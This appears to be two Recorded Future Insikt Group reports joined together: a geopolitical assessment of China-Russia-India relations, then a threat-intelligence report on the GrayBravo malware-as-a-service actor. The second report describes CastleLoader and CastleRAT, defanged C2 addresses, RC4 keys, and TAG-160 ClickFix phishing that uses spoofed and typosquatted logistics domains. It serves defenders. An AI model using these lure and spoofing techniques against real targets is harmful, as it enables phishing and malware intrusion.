There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to avoid overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began halting transactions with Russian customers, and at least one bank did so as recently as September 2025 after being sanctioned by the EU. In September 2024, China implemented a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.

Military Dynamics

Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more frequent and more complex, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to participate in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise involved a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber flight into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia conducted their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.

In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he stated that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further indicates that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”

Beyond military exercises, US officials have asserted as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government asserts that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is providing Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US sanctioned a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were working on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been involved in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.

Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.

Cooperation in Propaganda and Influence Operations

We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, including media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement stating that they would “jointly articulate a common stance in the global media space.”

China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) shows that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) spread narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely used a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.

Since approximately 2019, China has increasingly used computational propaganda and influence operation tactics likely learned by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently frame the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta banned Russian state media outlets from purchasing ads on its platforms, China Global TV Network placed at least 21 pro-Russia advertisements on Facebook in a single month.

China-India: Nascent Thaw of Longtime Tension-Filled Relationship

China-India relations have gone through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.

In recent months, China-India relations have likely returned to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely driven India to pursue improved ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” challenging years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, noted that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent rapprochement, significant hurdles and unresolved disagreements remain, making it less likely that China and India will form a long-term strategic partnership.

Political Dynamics

China’s approach to India is likely primarily driven by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to consolidate control over disputed border territories, leading to deadly skirmishes with India and cyberattacks against Indian critical infrastructure. India’s approach to China has likely been rooted in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.

Over the last year, China and India’s relations have thawed significantly, especially compared to 2020, when the China-India border dispute escalated. In 2024, China and India concluded an agreement that returned the border to its pre-2020 status, thereby completing a disengagement process and reopening border trade. India and China began re-engaging in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India resumed direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar emphasized the importance of continued cooperation between the two countries.

Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have endorsed the idea of a multipolar world, but Modi has emphasized the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely seeks to balance asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only supported inter-BRICS trade based on local currency.

Economic Dynamics

We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India issued Press Note 3, which limited Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly rejected a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.

Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily dependent on Chinese supply chains, which very likely gives Beijing some economic leverage over India.

India faces a significant and growing trade deficit with China — reaching $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China remains India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.

India has taken actions to reduce its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has bolstered investment in domestic production and implemented protectionist policies, such as the “Make in India” policy, the Production-Linked Incentive (PLI) scheme, and, most recently, the “National Manufacturing Mission.” Threatening China’s economic and technological interests, India banned hundreds of Chinese-developed mobile applications and has pursued efforts with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to impede Apple from moving its supply chain for US phones from China to India.

Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India views the region as its primary sphere of influence. The policy, considered a “defining subset of its overall foreign policy,” hinges on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly opposes China’s Belt and Road Initiative (BRI) because New Delhi views China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and counter India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project linking China and Pakistan through roads, railways, and pipelines — which India almost certainly perceived as the most immediate threat to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to facilitate Chinese energy imports while strengthening Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major concern for India.

Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion more in 2021 than in 2018. The total value of foreign direct investment from China into India also returned to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China launched the AIIB in 2016, and the bank has dozens of approved projects in India.

Military Dynamics

We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.

India and China share a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic dispute. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry devolved into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension followed, during which each side built up troops in the contested areas. After at least 21 rounds of Senior Highest Military Commander Level (Corps Commander) talks and other efforts, India and China signed an agreement in 2024, which led to the disengagement of troops. Even with border tensions currently defused, the overarching territorial dispute very likely persists as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.

In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active throughout the IOR, often as part of air, land, and sea-based multilateral exercises but also to support the PLA Navy’s “Far Seas Protection” strategy. In addition to military exercises, the PLA makes use of commercial ports in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely perceives China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes referred to as a “string of pearls” strategy by analysts outside of China — as an encirclement of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India competed to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately called at the port over New Delhi’s objections. In 2023, India objected to the presence of a Chinese state-owned research vessel, which China very likely uses to support PLA requirements. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to build out relevant infrastructure along disputed border areas.

Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual exercise with the US took place just 62 miles from a disputed border area. In 2024, India organized the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines conducted a joint naval drill in the South China Sea. India almost certainly views China’s military cooperation and integration with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is responsible for 81% of Pakistan’s arms imports.

India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade

India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and 2024, India and Russia defined their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin issued a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”

Political Dynamics

India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to support India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has called Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to reform global power dynamics and is not anti-West, in contrast to Russia’s goal of ushering in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has articulated that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, Why Bharat Matters, asserts that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”

India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its declared neutral, non-aligned strategy. India abstained on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently calls for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly maintained a warm friendship despite US and European criticism of Russia, and Modi has referred to Russia as India’s “all-weather friend and trusted ally.”

Economic Dynamics

Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has stated that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia has been India’s top supplier of crude oil, and Russian oil exceeded 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and enabled it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports remained steady in the first half of September 2025. The US subsequently imposed sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to pause new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude turned around in the Baltic Sea — an incident that oil analysts attributed to the US sanctions pressure. However, Indian Oil continued to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.

Total trade between India and Russia amounted to $68.7 billion in FY2025, likely surging as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi aims to achieve $100 billion in trade with Russia by 2030. Both countries seek to reduce reliance on the US dollar, and 90% of trade is now settled in ruble-rupee transactions. However, India’s trade with the West will likely complicate financial integration; India has been hesitant to adopt sanctions-resistant payment networks with Russia and has dismissed the idea of replacing the US dollar.

Military Dynamics

We assess that India and Russia’s military relationship is centered on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has purchased roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases include Russia’s S-400 missile defense system, which India used in May 2025 to repel Pakistani missile attacks. India and Russia have also pursued joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has stagnated on other fronts, such as joint training and exercises.

Although Moscow continues to be India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has sought to reduce its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US signed a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.

The documented poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” revealed internal documents from Russia’s state-owned defense conglomerate Rostec detailing how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.

State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation

China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.

Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.

RIC Format: Dormant, Though Russia and China Are Interested in Reviving It

The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.

Between 2002 and 2020, twenty trilateral ministerial-level meetings occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers meeting in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.

In a 2022 joint statement, China and Russia declared their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov reiterated in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely indicating India’s reserved openness to it.

BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement

The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization committed to perpetuating a multipolar world via political, security, and economic cooperation.

Though Russia and China have sought to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India views the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.

Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are based on foundational treaties. The New Development Bank (NDB) supports collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.

We assess that BRICS could also facilitate Russia and China’s efforts to develop alternatives to the US dollar, though India’s hesitation to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have explored the development of a common currency and have specifically created a cross-border digital payment and messaging system backed by cryptocurrency, called BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “identifying possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”

Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests

Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO Summit in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to focus on border security and ethnic minority separatism in China’s Xinjiang region, though it has since expanded to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India joined in 2017, after being an observer since 2005, with Russia’s support and possibly without China’s, as Beijing sponsored Pakistan’s membership that same year.

China and Russia have used the SCO to advance their geopolitical aims, including shaping future multipolarism and projecting power. In particular, China uses the SCO as a foundation for expanding an international security architecture that is consistent with the CCP’s regime security.

We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently aligned. For example, India initially did not participate in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later joined a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped facilitate bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly objected to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is using the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.

Indicators of Deeper Trilateral Cooperation

The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.

Note: The analysis cut-off date for this report was November 10, 2025

Executive Summary

Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.

For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.

To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for implementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).

Key Findings

• Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.
• One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.
• Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.

Background

In September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.

Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.

Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.

Figure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)

Threat Analysis

Higher Tier Infrastructure

Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.

Figure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)

CastleRAT

CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.

Infrastructure Analysis

Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two CastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, 104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.

Figure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)

Notably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00, and the server responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with 5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00 00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.

Clustering by RC4 Key

Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.

Figure 4: RC4 key clusters (Source: Recorded Future)

CastleLoader

Infrastructure Analysis

Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.

Notably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.

Activity Clusters

Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.

Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.

Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160

Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight & Analytics and Loadlink Technologies for multiple purposes.

Attack Flow

Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5 illustrates a high-level overview of the phishing attack flow.

Figure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)

The attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example, englandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.

The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt Group has observed multiple variations of these landing pages.

Figure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)

